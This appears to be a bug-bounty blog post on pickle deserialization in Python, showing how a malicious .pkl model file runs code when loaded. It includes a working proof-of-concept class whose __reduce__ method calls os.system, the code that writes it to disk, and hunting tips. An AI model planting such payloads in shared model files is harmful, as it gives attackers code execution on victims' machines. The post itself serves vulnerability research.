Sometimes the simplest bugs are the most dangerous — especially when they’ve been hiding in plain sight.
This one’s a classic pattern: pickle.load() + unsafe deserialization = RCE.
Let’s unpack a clean, minimal Model File Vulnerability (MFV) where a malicious .pkl file executes code the moment it's loaded. No edge cases, no extra steps — just Python doing Python things.
This one lives in the wide-open serialization mechanism that is Python’s built-in pickle module. If you’ve ever used pickle.dump() to save a model (or any object) and pickle.load() to bring it back — congrats, you’ve opened the door to arbitrary code execution.
Here’s why: pickle.load() doesn’t just deserialize data — it runs code. When an object is pickled, pickle records whatever its __reduce__() method returns, and those instructions are executed when the object is unpickled. And guess what? That method can return basically anything — including a tuple that tells Python: “hey, go ahead and run os.system('touch /tmp/poc') real quick.”
Here's a step-by-step demonstration of how this vulnerability can be exploited. You can find the full, working PoC in this Google Colab notebook.
Here's the breakdown:
We start by defining a class that overrides the __reduce__() method. Instead of returning instructions to recreate the object, it returns a system command:
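Something along these lines is enough (a minimal sketch; the class name is illustrative, the payload matches the PoC):

```python
import os

class MaliciousModel:
    # pickle calls __reduce__() when the object is dumped; whatever it
    # returns is stored in the .pkl as "how to rebuild this object".
    def __reduce__(self):
        # A callable plus its arguments: at load time, pickle will call
        # os.system("touch /tmp/poc") instead of reconstructing an object.
        return (os.system, ("touch /tmp/poc",))
```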
This instructs pickle to execute os.system("touch /tmp/poc") when the object is deserialized.
We use pickle.dumps() to serialize the object and write it to a file:
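Roughly like this (the model.pkl filename is just an assumption for the sketch):

```python
import pickle

# Serialize the malicious object; __reduce__() runs here and its return
# value gets baked into the byte stream.
payload = pickle.dumps(MaliciousModel())

# Ship it as an innocent-looking model file.
with open("model.pkl", "wb") as f:
    f.write(payload)
```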
Now, a victim simply loading this pickle file will unknowingly execute the payload:
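The trigger is nothing more exotic than the standard loading snippet (again a sketch, matching the filename above):

```python
import pickle

# The victim does nothing unusual: just loads what looks like a model file.
with open("model.pkl", "rb") as f:
    model = pickle.load(f)  # os.system("touch /tmp/poc") executes here
```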
At this point, /tmp/poc will be created on the victim’s machine — proof that the system command was executed.
This is a textbook MFV: code execution via a malicious model artifact.
Here’s what makes it a great pattern to hunt for:
- Framework-agnostic: This isn’t about TensorFlow or PyTorch. This is core Python. If a project uses .pkl to save or load models, it’s potentially vulnerable.
- Stupid simple: You don’t need to reverse engineer a binary format or fuzz some weird parser. Just override __reduce__() and you’re good. Get that bounty!
🔍 Look for:
- Calls to pickle.load(), pickle.loads(), or anything built on pickle- or HDF5-based formats
- ML libraries that save or share .pkl model files
- Tutorials or notebooks that tell users to "just load this .pkl"
If you can control the file, and it gets loaded — game on.
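If you want a quick way to triage a codebase for these sinks, something like this rough sketch works (the regex is illustrative, not exhaustive):

```python
import re
from pathlib import Path

# Rough pattern for pickle-based deserialization sinks.
SINK = re.compile(r"\bpickle\.loads?\s*\(")

for path in Path(".").rglob("*.py"):
    text = path.read_text(errors="ignore")
    for lineno, line in enumerate(text.splitlines(), start=1):
        if SINK.search(line):
            print(f"{path}:{lineno}: {line.strip()}")
```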
Sometimes the oldest bugs are still the juiciest. This report shows that even basic deserialization in Python can be a huge attack vector if model files aren’t handled securely.
If you're hunting MFVs, focus on deserialization workflows — especially where objects are reconstructed dynamically without validation. That’s often where execution paths get exposed. Happy hunting!